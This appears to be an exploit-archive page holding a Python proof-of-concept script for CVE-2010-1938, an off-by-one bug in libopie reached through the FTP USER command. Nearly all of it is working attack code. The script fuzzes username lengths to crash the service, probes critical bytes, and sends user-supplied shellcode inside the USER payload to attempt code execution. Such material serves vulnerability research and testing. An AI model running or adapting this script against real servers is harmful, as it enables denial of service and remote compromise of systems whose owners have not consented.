4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Improved PoC for CVE-2010-1938
Author: Nexxus67
"""

import argparse
from contextlib import closing
from dataclasses import dataclass
from itertools import cycle
import socket
import time
from typing import Optional, Tuple

# ----------------------------------------------------------------------
# Default configuration (can be modified via arguments)
DEFAULT_IP = "your-target-ip"
DEFAULT_PORT = 21
DEFAULT_TIMEOUT = 5
RECV_BUFFER = 1024
# ----------------------------------------------------------------------

PayloadResult = Tuple[Optional[bytes], Optional[bytes]]


@dataclass(frozen=True)
class TargetConfig:
    """Immutable configuration for the FTP target."""

    ip: str
    port: int = DEFAULT_PORT
    timeout: float = DEFAULT_TIMEOUT
    buffer_size: int = RECV_BUFFER


def decode_bytes(data: Optional[bytes]) -> str:
    """Safely decode bytes ignoring unexpected unicode errors."""

    if not data:
        return "(no data)"
    return data.decode(errors="ignore").strip()


class ExploitClient:
    """Wraps the target configuration and common FTP helper routines."""

    def __init__(self, config: TargetConfig) -> None:
        self.config = config

    def _open_socket(self, timeout: Optional[float] = None) -> socket.socket:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout if timeout is not None else self.config.timeout)
        sock.connect((self.config.ip, self.config.port))
        return sock

    def send_payload(self, payload: bytes) -> PayloadResult:
        """Send a USER payload and return the banner and response."""

        try:
            with closing(self._open_socket()) as sock:
                banner = sock.recv(self.config.buffer_size)
                sock.sendall(b"USER " + payload + b"\r\n")
                response = sock.recv(self.config.buffer_size)
                return banner, response
        except OSError as exc:
            print(f"[-] Payload failed: {exc}")
            return None, None

    def is_service_alive(self, timeout: Optional[float] = None) -> bool:
        """Check if the FTP service accepts a connection within the timeout."""

        try:
            with closing(self._open_socket(timeout=timeout)):
                return True
        except OSError:
            return False


def check_crash(client: ExploitClient, timeout: float = 2.0) -> bool:
    """Return True if the target refuses new connections (likely crashed)."""

    return not client.is_service_alive(timeout=timeout)


def generate_pattern(length: int) -> bytes:
    """Produce a cyclic pattern for manual offset hunting."""

    upper = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    lower = b"abcdefghijklmnopqrstuvwxyz"
    digits = b"0123456789"
    pattern = bytearray()
    for a, b, c in zip(cycle(upper), cycle(lower), cycle(digits)):
        pattern.extend((a, b, c))
        if len(pattern) >= length:
            return bytes(pattern[:length])
    return bytes(pattern)


def fuzz_length(client: ExploitClient, start: int = 200, end: int = 400, step: int = 1) -> Optional[int]:
    """Sweep username lengths and return the first size that crashes the service."""

    print(f"[*] Fuzzing lengths from {start} to {end} (step {step})")
    for size in range(start, end + 1, step):
        payload = b"A" * size
        print(f"[*] Testing length {size}... ", end="", flush=True)

        banner, _ = client.send_payload(payload)
        if banner is None:
            print("[!] Unable to deliver payload. Stopping fuzzing.")
            return None

        if check_crash(client):
            print("CRASH detected!")
            return size
        print("OK")
        time.sleep(0.5)

    print("[!] No crash detected in the tested range.")
    return None


def test_critical_byte(client: ExploitClient, critical_length: int, byte: bytes = b"\x00") -> bool:
    """Exercise the off-by-one byte at the given length to see if it crashes."""

    payload = b"A" * (critical_length - 1) + byte
    print(f"[*] Testing critical byte: {byte.hex()} (length {critical_length})")

    banner, response = client.send_payload(payload)
    print(f"[+] Banner: {decode_bytes(banner)}")
    if response:
        print(f"[+] USER response: {decode_bytes(response)}")

    if check_crash(client):
        print("[!!!] CRASH detected! The critical byte affects the service.")
        return True
    print("[-] Service is still alive.")
    return False


def send_shellcode(client: ExploitClient, shellcode: bytes, payload_length: int) -> None:
    """Embed the provided shellcode inside the USER payload for experimentation."""

    if payload_length <= len(shellcode):
        print("[-] Payload length must be larger than the shellcode size.")
        return

    payload = shellcode + b"A" * (payload_length - len(shellcode))
    banner, response = client.send_payload(payload)
    print(f"[+] Banner: {decode_bytes(banner)}")
    print(f"[+] USER response: {decode_bytes(response)}")

    if check_crash(client):
        print("[!!!] Service crashed. Possible execution (context dependent).")
    else:
        print("[-] Service is still alive.")


def main() -> None:
    parser = argparse.ArgumentParser(description="Improved PoC for CVE-2010-1938 (off-by-one in libopie)")
    parser.add_argument("ip", nargs="?", default=DEFAULT_IP, help="FTP server IP")
    parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT, help="FTP port (default: 21)")
    parser.add_argument("--fuzz", action="store_true", help="Fuzzing mode: find length causing crash")
    parser.add_argument("--byte-test", metavar="BYTE", help="Test a specific byte (e.g., 00, ff) at critical position")
    parser.add_argument("--shellcode", metavar="FILE", help="File containing binary shellcode to send (experimental)")
    parser.add_argument("--length", type=int, help="Payload length for --byte-test or --shellcode")
    args = parser.parse_args()

    client = ExploitClient(TargetConfig(ip=args.ip, port=args.port))

    if args.fuzz:
        print("[*] Fuzzing mode")
        critical_length = fuzz_length(client)
        if critical_length:
            print(f"\n[+] Critical length found: {critical_length}")
    elif args.byte_test:
        if not args.length:
            print("[-] --byte-test requires --length")
            return
        byte = bytes.fromhex(args.byte_test)
        test_critical_byte(client, args.length, byte)
    elif args.shellcode:
        if not args.length:
            print("[-] --shellcode requires --length")
            return
        with open(args.shellcode, "rb") as payload_file:
            shellcode = payload_file.read()
        send_shellcode(client, shellcode, args.length)
    else:
        print("[*] No specific arguments. Running quick test with typical lengths...")
        lengths = [256, 257, 258, 300, 400]
        for length in lengths:
            payload = b"A" * length
            print(f"\n[*] Testing length {length}")
            banner, response = client.send_payload(payload)
            print(f"[+] Banner: {decode_bytes(banner)}")
            if response:
                print(f"[+] Response: {decode_bytes(response)}")

            if banner is None and response is None:
                print("[!] Payload delivery failed during demo run. Stopping.")
                break

            if check_crash(client):
                print("[!!!] CRASH detected!")
                break
            print("[-] Server responds normally.")
            time.sleep(1)


if __name__ == "__main__":
    main()